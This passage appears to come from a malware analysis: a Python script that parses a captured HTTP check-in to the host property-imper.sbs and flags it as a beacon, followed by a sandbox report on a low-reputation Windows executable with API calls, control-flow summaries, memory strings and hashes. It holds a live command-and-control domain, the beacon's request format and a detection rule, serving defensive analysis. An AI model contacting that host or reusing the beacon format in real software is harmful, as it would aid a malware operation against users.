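    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 8\r\n"
    b"Host: property-imper.sbs\r\n"
    b"\r\n"
    b"act=life"
)
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: close\r\n"
    b"Set-Cookie: PHPSESSID=i0u5nq0e708305nu3leec7mi5p; path=/\r\n"
    b"Server: cloudflare\r\n"
    b"\r\n"
    b"2\r\nok\r\n"   # the report's "2ok" line: chunk size 2, chunk data "ok"
    b"0\r\n\r\n"     # the report's "0" line: terminating zero-length chunk
)


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)   # header names lower-cased
    body: bytes = b""


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body (RFC 9112, section 7.1)."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)          # trailer fields, if any, are ignored
        out += raw[pos:pos + size]
        pos += size + 2                # skip the CRLF that ends the chunk data


def parse_http(raw: bytes) -> HttpMessage:
    """Split a raw HTTP/1.1 message into start line, headers and decoded body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    msg = HttpMessage(start_line=lines[0])
    for line in lines[1:]:
        name, _, value = line.partition(":")
        msg.headers[name.strip().lower()] = value.strip()
    if msg.headers.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    elif "content-length" in msg.headers:
        body = body[: int(msg.headers["content-length"])]
    msg.body = body
    return msg


def is_life_beacon(req: HttpMessage, resp: HttpMessage) -> bool:
    """Match the check-in seen in the sandbox: POST /api, form body act=life, 'ok' reply.

    This rule is the example's own; it is not a published signature.
    """
    parts = req.start_line.split(" ")
    if len(parts) < 3 or parts[0] != "POST" or parts[1] != "/api":
        return False
    ctype = req.headers.get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return False
    form = parse_qs(req.body.decode("latin-1"))
    if form.get("act") != ["life"]:
        return False
    return resp.start_line.startswith("HTTP/1.1 200") and resp.body.strip() == b"ok"


def analyse(request: bytes = REQUEST, response: bytes = RESPONSE) -> dict:
    """Parse one request/response pair and report the fields an analyst wants."""
    req, resp = parse_http(request), parse_http(response)
    return {
        "host": req.headers.get("host"),
        "user_agent": req.headers.get("user-agent", ""),
        "request_body": req.body.decode("latin-1"),
        "response_body": resp.body.decode("latin-1"),
        "beacon": is_life_beacon(req, resp),
    }


if __name__ == "__main__":
    print(analyse())
```

`analyse()` returns the Host, the decoded 8-byte request body, the de-chunked response body ("ok") and the beacon verdict; swapping `act=life` for any other value, or changing the path, makes `is_life_beacon()` return False, which is the knob to adjust if later captures show other `act=` verbs.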



                              Target ID: 0
                              Start time: 05:33:22
                              Start date: 24/11/2024
                              Path: C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit): true
                              Commandline: "C:\Users\user\Desktop\file.exe"
                              Imagebase: 0xfe0000
                              File size: 1'867'776 bytes
                              MD5 hash: C7FFD9F68AF166BC332AD19BE70C3B5C
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: low
                              Has exited: true


                                Execution Graph

                                Execution Coverage:2.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:65.8%
                                Total number of Nodes:231
                                Total number of Limit Nodes:15
                                execution_graph (node and edge list of the rendered graph, summarised here by the API-calling nodes it contains)
                                • 101df70: LdrInitializeThunk, reached from almost every other node through the wrappers at 1020480, 1020610, 10207b0, 1020880, 1020b70, 1020c80, 1021580, 101b8e0, 101bb20, 101bfa0 and 101c040
                                • 101b7e0 (call at 101b83f): RtlAllocateHeap; called from 1003d70, 1020f60, 101ded0, 1020c80, 1021580 and 101b8e0
                                • feb210 -> 101ded0 -> 101b7e0: RtlAllocateHeap; called from ffdb30, fea2e1 and fec32b
                                • feceb3: CoInitializeSecurity
                                • fece80: CoInitializeEx, called from fe89a0
                                • fed7d3: CoUninitialize
                                • fecf05 calls 1019030 twice; 1019030 calls SysAllocString (10191b1), CoSetProxyBlanket (10191ea), GetVolumeInformationW (101969c) and SysFreeString twice (1019658)
                                • fe89a0: ExitProcess (fe8cb3); fe8cae -> 101deb0 -> 101f460 -> FreeLibrary (101deb5)
                                • 1001960, fee0d8 (via 1005e90, 1006190, 1007e20 and 1008c90), ff9130, fedc33 and fee88f reach only LdrInitializeThunk and RtlAllocateHeap through the wrappers above

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph for 1019030-10197f5 (basic-block edge list of the rendered graph). Calls made from this function: 101f9a0 followed by GetVolumeInformationW (block 101968c-10196b8), SysAllocString (10191b1-10191e4), CoSetProxyBlanket (10191ea-1019204), SysFreeString twice (1019658-1019668), 1000650 (blocks 10196bc, 10196fe, 101974e and 101979e), fe8330 (blocks 10196ee, 101973e, 101978e and 10197de), fe82b0 (101948f-10194b7), and fe82e0 then fe82c0 (1019613-1019633).
                                APIs
                                • SysAllocString.OLEAUT32(13C511C2), ref: 010191B7
                                • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 010191FC (arguments decode to dwAuthnSvc = RPC_C_AUTHN_WINNT (10), dwAuthzSvc = RPC_C_AUTHZ_NONE, pServerPrincName = NULL, dwAuthnLevel = RPC_C_AUTHN_LEVEL_CALL (3), dwImpLevel = RPC_C_IMP_LEVEL_IMPERSONATE (3), pAuthInfo = NULL, dwCapabilities = EOAC_NONE: the standard proxy-blanket setup for a WMI IWbemServices connection, consistent with the Win32_Bios / Win32_BaseBoard query flagged in the signatures)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: AllocBlanketProxyString
                                • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                • API String ID: 900851650-4011188741
                                • Opcode ID: e9803d5c3696f40e31feca602a8d71973297761d77ffc7e4e3c8f050647ab9da
                                • Instruction ID: 033e97e0518c8e4a6aa89581475c11107b2e856b770e8e4b5aecd2c92c889fed
                                • Opcode Fuzzy Hash: e9803d5c3696f40e31feca602a8d71973297761d77ffc7e4e3c8f050647ab9da
                                • Instruction Fuzzy Hash: 4B2230B19083019BE320CF24CC91B6BBBE6FF85358F148A1CE5D99B285D779E505CB92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph for fecf05-fed791 (basic-block edge list of the rendered graph). Calls made from this function: fe8930 followed by 1019030 (blocks fecf5e-fecfa5 and fed3ae-fed3c5) and feb960 (blocks fed31c-fed36b and fed74c-fed791); the remaining blocks are straight-line code and self-looping blocks (fecf20, fecfb0, fed070, fed270, fed300, fed3f0, fed4b0, fed6a0, fed730 and the short loops between them).
                                Strings
                                Memory Dump Source: same dump files and IDA snapshot (hcaresult_0_2_fe0000_file.jbxd) as listed for the first function above.
                                Similarity
                                • API ID:
                                • String ID: ()$+S7U$,_"Q$0C%E$64E9C36C5EF9ADA1D7CBBD6DF28D3732$7W"i$;[*]$<KuM$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                                • API String ID: 0-3957167144
                                • Opcode ID: 9aec5df8dca24529fd1585c591fa4566625f06bf43a836ef5196f4f89973a6d1
                                • Instruction ID: 19a08efd3f01cb842264c10aceda84a67a30c0563ab772dd1f7ce02341330fe7
                                • Opcode Fuzzy Hash: 9aec5df8dca24529fd1585c591fa4566625f06bf43a836ef5196f4f89973a6d1
                                • Instruction Fuzzy Hash: DB12FDB19483D18ED335CF26C495BEFBBE1ABD2304F28895CC4DA5B256C775090ACB92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph for fe89a0-fe8cbb (basic-block edge list of the rendered graph). Calls made from this function: 101cb70 (fe89a0-fe89b1), 1016620 (fe89b7-fe89cf), fe9ed0 (fe8c8a-fe8ca2), fece80 (fe8ca4), feb930 (fe8ca9), 101deb0 (fe8cae) and ExitProcess (fe8cb3-fe8cbb).
                                APIs
                                • ExitProcess.KERNEL32(00000000), ref: 00FE8CB6
                                Memory Dump Source: same dump files and IDA snapshot (hcaresult_0_2_fe0000_file.jbxd) as listed for the first function above.
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: d5ca0879f86ca9f20df572a4ea65a76b0e0908fb1c39b99e4ebbead5ae03bc19
                                • Instruction ID: 7c9a3dabfb4f8c04b8a51fa5ca1cf0ea033434d9a3eee0999258eec134d6a67c
                                • Opcode Fuzzy Hash: d5ca0879f86ca9f20df572a4ea65a76b0e0908fb1c39b99e4ebbead5ae03bc19
                                • Instruction Fuzzy Hash: F0710373B547054BC708DEBADC9236BFAD6ABC8710F09D83D6889D7390EAB89C054685

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 234 101df70-101dfa2 LdrInitializeThunk
                                APIs
                                • LdrInitializeThunk.NTDLL(0101BA46,?,00000010,00000005,00000000,?,00000000,?,?,00FF9158,?,?,00FF19B4), ref: 0101DF9E
                                Memory Dump Source: same dump files and IDA snapshot (hcaresult_0_2_fe0000_file.jbxd) as listed for the first function above.
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 283 febc9d-febcaf 284 febcb0-febcc4 283->284 284->284 285 febcc6-febcd5 284->285 286 febcd8-febcf7 285->286
                                Memory Dump Source: same dump files and IDA snapshot (hcaresult_0_2_fe0000_file.jbxd) as listed for the first function above.
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fba9f5e9ab781c5ef5103ffe2beb59575daae2fcca16df9699a04c5a53c6ce4
                                • Instruction ID: cab227febc7d6cd5eb885d6c775ac057be281c10732ccd4d047eb4cc75967673
                                • Opcode Fuzzy Hash: 2fba9f5e9ab781c5ef5103ffe2beb59575daae2fcca16df9699a04c5a53c6ce4
                                • Instruction Fuzzy Hash: D2F0E2706083814BD3389F24D89167FB7A0AB82614F20581CE2C2C2282EA26D8029B09

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 229 101b7e0-101b7ff 230 101b800-101b83d 229->230 230->230 231 101b83f-101b85b RtlAllocateHeap 230->231
                                APIs
                                • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0101B84E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 610ef365547786ec3303511f97fb63d0288c0f9504463240f9f43bb8c1091027
                                • Instruction ID: 95fe159ede45b7b171374853ea99d8d8fddd4589928ba7c47a237fa110b115fe
                                • Opcode Fuzzy Hash: 610ef365547786ec3303511f97fb63d0288c0f9504463240f9f43bb8c1091027
                                • Instruction Fuzzy Hash: 33019933A453080BC310AE7CDCD464AFBA6EFD9224F2A067CE5D4873D1DA32990AC395

                                Control-flow Graph
                                • Basic blocks: feceb3-fecee2 (CoInitializeSecurity)
                                APIs
                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FECEC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: InitializeSecurity
                                • String ID:
                                • API String ID: 640775948-0
                                • Opcode ID: 562d840d98b690879c3880451663e3794ba3204aa9cbd661476d54f64c419b0c
                                • Instruction ID: 03edf09ba887f1d623103f2aa4906f403a4af4f5f7670b94ff82bd82d85babb2
                                • Opcode Fuzzy Hash: 562d840d98b690879c3880451663e3794ba3204aa9cbd661476d54f64c419b0c
                                • Instruction Fuzzy Hash: 65D012353E434176F97489089C53F1422158706F64F341B08F772FE2C5C9D27181860C

                                Control-flow Graph
                                • Basic blocks: fece80-feceb0 (CoInitializeEx)
                                APIs
                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 00FECE93
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 9a8ea77699c5139be966c94e9d9068e475934236c353a6ffd48dbfba26769c24
                                • Instruction ID: 1385b778583f182dec4800e8a98ceb34f2b3e813890f1411029c28e405ab8e1a
                                • Opcode Fuzzy Hash: 9a8ea77699c5139be966c94e9d9068e475934236c353a6ffd48dbfba26769c24
                                • Instruction Fuzzy Hash: 9FD0973029020873D130652CEC43F13322D8702710F000236FAA2CA1C2DD0BA800D2A1

                                Control-flow Graph
                                • Basic blocks: fed7d3-fed7d8 (CoUninitialize) -> fed7da-fed7e1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: Uninitialize
                                • String ID:
                                • API String ID: 3861434553-0
                                • Opcode ID: 64aeb46c3d861ad367605df3357697c13ab63ba314a38faac42600e5e3056ba4
                                • Instruction ID: acf7891bfc92ee3b3070f7b803d85b244a826f9e464a46405b0878b8b697329a
                                • Opcode Fuzzy Hash: 64aeb46c3d861ad367605df3357697c13ab63ba314a38faac42600e5e3056ba4
                                • Instruction Fuzzy Hash: 6EA0113BB00008A88B0008A8BC020EEF328E28023AB00AAB3C22CC2000EA2202280280
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                • API String ID: 1279760036-1524723224
                                • Opcode ID: 1c7cbf4841ab2834356bbe8495e6ff94ad948d2adedee6f399ba1a7d362eae98
                                • Instruction ID: 06cacb607fd0a6a87996dc862d22a93edeab96652e8ffded4d15c52d0a89c31b
                                • Opcode Fuzzy Hash: 1c7cbf4841ab2834356bbe8495e6ff94ad948d2adedee6f399ba1a7d362eae98
                                • Instruction Fuzzy Hash: 7D22AD7150C3808FE3628F28C0843AEBBE1AB95314F19896DE6D9C73D2D77A8845CB47
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                • API String ID: 0-1787199350
                                • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                • Instruction ID: 9552abe1343b651655e6d6080d583d4b210e1587bf44d719fd968c72732d35de
                                • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                • Instruction Fuzzy Hash: 2EB1D67050C3C18FD3158F2A80607ABBFE1AF97354F18496DE4D58B392D779890ADB62
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: "Im$7[]n$B*_y$KGQo$L?|$Ovuw$^_?O$z6<$m'
                                • API String ID: 0-618650539
                                • Opcode ID: 9b2a7a6b876066815d8e6fa8075736423892587b6f2e0dfdfc4f6a826a0bc4c9
                                • Instruction ID: 44452fd667556a69209bd9da27a59c5d99b804e112423a4cbefe7bb179de7deb
                                • Opcode Fuzzy Hash: 9b2a7a6b876066815d8e6fa8075736423892587b6f2e0dfdfc4f6a826a0bc4c9
                                • Instruction Fuzzy Hash: 2EB2F5F360C2049FE304AF29EC8567ABBE5EF94720F16493DEAC5C7344EA3598418697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: 64E9C36C5EF9ADA1D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                • API String ID: 0-1202497603
                                • Opcode ID: 0ff44e37b37ad7599842162daafc0fe151d97f04a390af0e4d438deda36001df
                                • Instruction ID: 3c9376a8c1a03be56445cc1f9f2f07af03dc631580416a62388d568bd2f2b3f0
                                • Opcode Fuzzy Hash: 0ff44e37b37ad7599842162daafc0fe151d97f04a390af0e4d438deda36001df
                                • Instruction Fuzzy Hash: 4CE15CB2A483904BD324CF36C85136BBBE2EBD1314F198A2DE5E58B395D778C905CB52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'Zs$,zs$.o$>}z$B9n$B9n$BOtv$Y?
                                • API String ID: 0-4261149634
                                • Opcode ID: 74672d235f3eb75a4e9d45363c7d522fd0075ffb5eeb64dd4a3f162de28803d8
                                • Instruction ID: d4cfa8c28579297457620b23c69f5b4722ada94ea264b3f92f8a9d1479f4cdfb
                                • Opcode Fuzzy Hash: 74672d235f3eb75a4e9d45363c7d522fd0075ffb5eeb64dd4a3f162de28803d8
                                • Instruction Fuzzy Hash: A9B2F6F360C600AFE304AE29EC8567AFBE5EF94720F16893DE6C4C3744E67598058693
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: e"+$!-ss$<Twx$<Twx$^j^{$rO2$!^}$Zo{
                                • API String ID: 0-2338767884
                                • Opcode ID: 23ce540821d1f7c6971eefc90dfb3819298604be527abbdda5c389e5eeeea9b3
                                • Instruction ID: 014fa63529b4a6da5eb9a49693e7cf94139f13071f2da58cc4785aa1e9972da9
                                • Opcode Fuzzy Hash: 23ce540821d1f7c6971eefc90dfb3819298604be527abbdda5c389e5eeeea9b3
                                • Instruction Fuzzy Hash: 3AB2D5F3A0C204AFD704AE2DEC8566AFBE9EF94720F16493DEAC4C3744E63558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: <kUo$V{}$[>}s$_o$uj=7${]_O
                                • API String ID: 0-2069070147
                                • Opcode ID: 840160aeb7b3177d4093c02b4452428203d266efbbeae5c643b8d219867e8629
                                • Instruction ID: 7024ac2d43df3e8ffb749806c6b5effc9c85c8a1a10d83f47288eeaf8c5df37c
                                • Opcode Fuzzy Hash: 840160aeb7b3177d4093c02b4452428203d266efbbeae5c643b8d219867e8629
                                • Instruction Fuzzy Hash: BCB2E5F3A0C2049FE304AE2DEC8567ABBE5EFD4720F16893DE6C583744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                • API String ID: 0-3274379026
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: Xj_$ZF$bJ}r$yw{$v
                                • API String ID: 0-58789041
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: 3kl$!3[$;eo$d2{|$qU
                                • API String ID: 0-177640963
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: P:$'\U$b2{<$q%h
                                • API String ID: 0-2483310415
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0~co${Vo$"s}$Z\
                                • API String ID: 0-2031274851
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: )u=$,r>$O2o$hda
                                • API String ID: 0-961633468
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,-_$-_W$GX~k$L-;T
                                • API String ID: 0-3142116795
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,!s~$UKH<$_@Yu$_@Yu
                                • API String ID: 0-974135024
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: Lk$U\$Zb$property-imper.sbs$r
                                • API String ID: 0-2211913898
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: )=+4$57$7514$84*6$N
                                • API String ID: 0-4020838272
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: +2/?$=79$BBSH$GZE^
                                • API String ID: 0-3392023846
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: H{D}$TgXy$_o]a$=>?
                                • API String ID: 0-2004217480
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: =:;8$=:;8$a{$kp
                                • API String ID: 0-2717198472
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: %]?_$Fowc$caQG
                                • API String ID: 0-27560083
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: @A$lPLN$svfZ$IK
                                • API String ID: 0-1806543684
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?Cw~$FtA$gSN
                                • API String ID: 0-4176348373
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: !iw}$$3}o$Xl|v
                                • API String ID: 0-3405713809
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: )$)$IEND
                                • API String ID: 0-588110143
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: @J$KP$VD
                                • API String ID: 0-3841663987
                                Strings
                                Memory Dump Source
